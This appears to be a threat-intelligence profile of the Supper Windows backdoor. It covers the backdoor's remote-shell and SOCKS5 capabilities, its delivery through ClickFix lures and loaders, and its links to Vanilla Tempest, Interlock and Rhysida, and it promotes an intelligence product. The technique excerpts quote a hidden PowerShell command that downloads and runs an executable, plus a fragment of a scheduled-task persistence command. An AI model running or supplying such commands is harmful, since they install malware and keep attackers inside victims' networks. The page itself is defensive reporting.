Supper is a compact Windows backdoor used in intrusion chains that frequently precede ransomware deployment. It is also referred to as SocksShell, WINDYTWIST, and in some reporting ZAPCAT. The malware is designed to provide operators with persistent remote access, commonly exposing remote shell functionality and SOCKS5 proxying to support hands-on-keyboard operations inside compromised environments. Reported capabilities include executing commands through the Windows command interpreter, accepting and running DLL payloads, tunneling traffic, and in some variants self-deletion and encrypted command-and-control communications. Multiple reports also associate Supper with persistence mechanisms such as scheduled tasks or Run-key execution, depending on the campaign and variant.
Supper has been observed as a post-access implant delivered after social-engineering and malware-loader activity rather than as a standalone initial-access tool. Documented delivery chains include Fake CAPTCHA and ClickFix lures that trick users into pasting malicious PowerShell into the Windows Run dialog or Terminal, as well as follow-on deployment after GootLoader infections. It has also been delivered through trojanized software installers, fake software download pages, malvertising and SEO-poisoning ecosystems, and general-purpose loaders and packers including pkr_mtsi. Some campaigns have used DLL sideloading to launch related payloads under trusted processes.
The malware is strongly associated with financially motivated ransomware operations and access brokers. It has been repeatedly linked to Vanilla Tempest, also known as DEV-0832 and Vice Society, and has been observed in activity tied to Interlock and Rhysida. Reporting also notes overlap between Supper and tooling such as InterlockRAT, NodeSnake, JunkFiction, Oyster, MeowBackConn, and Latrodectus within broader criminal intrusion ecosystems. In observed incidents, Supper has been used alongside legitimate remote administration and file-transfer tools to maintain access, support credential theft and lateral movement, and prepare victim networks for data theft and ransomware deployment.
Victimology associated with Supper reflects the campaigns in which it appears rather than a uniquely defined targeting profile of the malware itself. It has been seen in attacks affecting healthcare, education, government, manufacturing, information technology, and other enterprise environments, with a notable concentration in U.S.-based ransomware intrusions. Supper is best understood as a lightweight but operationally important backdoor that enables sustained operator access and internal maneuvering during pre-ransomware compromise.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Lorem Ipsum appears to be a parallel or successor loader within Rapid Brigantine's expanding toolkit, culminating in handoff to their documented post-exploitation arsenal (Supper, Oyster, MeowBackConn) and ultimately to Rhysida ransomware deployment.
According to X-Force, the clearest overlap is the shared use of the Supper backdoor, also known as SocksShell or WINDYTWIST, which has appeared in confirmed incidents tied to both ransomware operations.
Storm-0494 deploys backdoors like Supper (SocksShell or ZAPCAT) and AnyDesk for remote access, further compromising networks.
X-Force links the group to malware developers/operators such as Broomstick, Supper, PortStarter, SystemBC, and Rhysida ransomware...
16 distinct techniques documented for this family, organized by ATT&CK tactic.
"As a persistence mechanism, the sample added itself as a Windows scheduled tasks: schtasks.exe /Create /SC MINUTE /TN GoogleUpdateTask ..."
Its main purpose is to provide threat actors with command line access to a victim (enabling “hands on keyboard” activity).
C:\windows\system32\WindowsPowerShell\v1.0\PowerShell.exe -WindowStyle Hidden -Command ... Invoke-WebRequest -Uri $b -OutFile "$env:TMP\asdin2oe.exe"; & "$env:TMP\asdin2oe.exe"
"The ability to proxy traffic through the infected machine allows threat actors to map the internal network stealthily"
"Other supported commands include, at minimum, a SOCKS proxy feature"; YARA strings include "bad socks5 request" and "Starting Init SOCKS"
43 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
14 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A backdoor used by both Interlock and Rhysida that maintains persistent access, creates encrypted tunnels, and executes remote shell commands. IBM found it shares command structures, C2 registration formats, and self-deletion behavior with InterlockRAT.
A post-exploitation SOCKS5 backdoor/tool in Rapid Brigantine's arsenal, mentioned as downstream tooling associated with Lorem Ipsum-enabled intrusions.
Referenced as a secondary payload family used post-compromise; associated with C2 infrastructure and described as supporting data exfiltration/lateral movement and potential ransomware deployment in the campaign.
Supper is a Windows malware family used for persistence and remote control. In this incident it established persistence via a scheduled task, communicated with hardcoded/updated C2 IP:port infrastructure using a custom encrypted protocol (XOR 'M' header + custom stream-like cipher), supported at least C2 server list updates, a SOCKS proxy feature, and execution of custom binaries delivered from C2 (suggesting a loader/backdoor role commonly used ahead of follow-on payloads, including ransomware).
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.